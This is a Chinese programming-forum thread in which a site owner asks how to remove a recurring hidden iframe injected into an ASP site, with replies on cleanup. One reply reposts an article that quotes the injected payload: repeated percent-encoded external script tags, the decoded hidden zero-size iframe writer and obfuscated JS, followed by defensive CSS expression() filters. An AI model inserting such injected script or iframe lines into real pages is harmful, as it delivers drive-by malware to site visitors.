| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 4046 人关注过本帖, 1 人收藏
标题:asp网站被挂木马了,怎么办?
只看楼主 加入收藏
都市打工者
Rank: 1
等 级:新手上路
帖 子:177
专家分:0
注 册:2007-8-7
结帖率:100%
收藏(1)
 问题点数:0 回复次数:5 
asp网站被挂木马了,怎么办?
我的网站文件下面被添加了<iframe src=http://www. width=0 height=0></iframe>,所以打开时候很慢,我把这个代码删除了,但是不久又来了,怎么办啊?谢谢大家帮我看下了
搜索更多相关主题的帖子: 木马 asp 文件 代码 删除 
2008-05-05 09:06
dhdhzzw
Rank: 1
等 级:新手上路
帖 子:949
专家分:0
注 册:2007-8-13
收藏
得分:0 
按日期搜索,,,和原来的备份对比。看是否有多余的。.asp文件
删除掉,,然后清除所有文件中的木马
2008-05-05 15:07
jamesxiaoyao
Rank: 1
等 级:新手上路
威 望:2
帖 子:173
专家分:0
注 册:2007-5-21
收藏
得分:0 
查询下最近的文件,肯定被放了一个,可能不止一个。asp文件,或者是一个ASPX文件。
2008-05-05 15:28
yms123
Rank: 16Rank: 16Rank: 16Rank: 16
等 级:版主
威 望:209
帖 子:12488
专家分:19042
注 册:2004-7-17
收藏
得分:0 
这有可能是服务器自身被感染,彻底根除的办法就是解决掉服务器自身的病毒才可以。
2008-05-05 15:30
lele2007
Rank: 5Rank: 5
来 自:广东省深圳
等 级:职业侠客
威 望:6
帖 子:1028
专家分:305
注 册:2007-9-4
收藏
得分:0 
给你参考下(不知道合不合适你)
是<iframe>...</iframe>和<script>...</script>挂马的一些解决方法:
解决全部网页木马的技巧
还是挂马问题,这段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来写出文章给大家参考下。
前不久《一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了,现在流行挂<script>木马,汗了,看了几个网友的网站都被这样了——页面的顶部或底部加上了:  
注意,以下地址含有木马,请不要轻易访问:

<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>
<script src=http://%76%63%63%64%2E%63%6E></script>

汗死,一连插入了N个一样的<script>标记。偶的电脑什么补丁都打了,直接访问这个http://%76%63%63%64%2E%63%6E(或直接使用迅雷下载),额~ 现形了:
document.write("<div style='display:none'>")
document.write("<iframe src=http://a. width=0 height=0></iframe>")
document.write("</div>")
又用迅雷下载http://a.这个文件,一看,乱七八糟的JS编码,汗,不过找到了一个类似QQ号的数字,直接加加看,汗,然后是专业提供网马的组织,哎,什么世道。还收费蛮高滴呢!
...
var Kfqq, Qqs="176878999"; qwfgsg="LLLL\\XXXXXLD"; Kfqq = Qqs;
(...略)(下面还有N个统计的JS代码) 网页教学网
针对上面的情况,我也不能白白瞧着不管,想想办法吧,兄弟。喝了碗绿豆粥,糖放得蛮多的,好喝。办法想到了。稍微分析就得出了答案。大家来看看,<script>木马的特点是什么:
<script src=http://%76%63%63%64%2E%63%6E></script>

对了,script木马的src一般都是外域的,也就是src是以http打头的,如果是自己网站的script一般都不用加上http;再看看木马的原形,里面还是输出的iframe、JS代码或是其他<object>代码,不管这么多,来多少杀多少。

来跟我写CSS,一一搞定它们,我写了5种不同的方案,大家来测试一下哈:
解决方案1:

iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');}/*这行代码是解决挂IFRAME木马的哦*/
script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');}
原理:将<script>标记的src拿出来转为小写,再看是不是以“http”开头的外域JS脚本文件,如果是,则页面内容清空并写出“木马被成功隔离!”。反之正常显示。
缺点:访客无法看到被感染了<script>木马的页面m
解决方案2:

iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');}
script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');}

原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了
解决了问题!呵呵!
[bo]转贴:http://www.[/bo]
本文的地址是: http://www.  转载请注明出处!

[[it] 本帖最后由 lele2007 于 2008-5-5 15:59 编辑 [/it]]

学习编程www.
2008-05-05 15:56
bjbaima
Rank: 1
等 级:新手上路
帖 子:52
专家分:0
注 册:2008-4-22
收藏
得分:0 
有一些是放在数据库里的,你不光要看网页文件,还要看一下数据库。可以用批处理方式净除。
2008-05-05 20:48
快速回复:asp网站被挂木马了,怎么办?
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.035141 second(s), 9 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved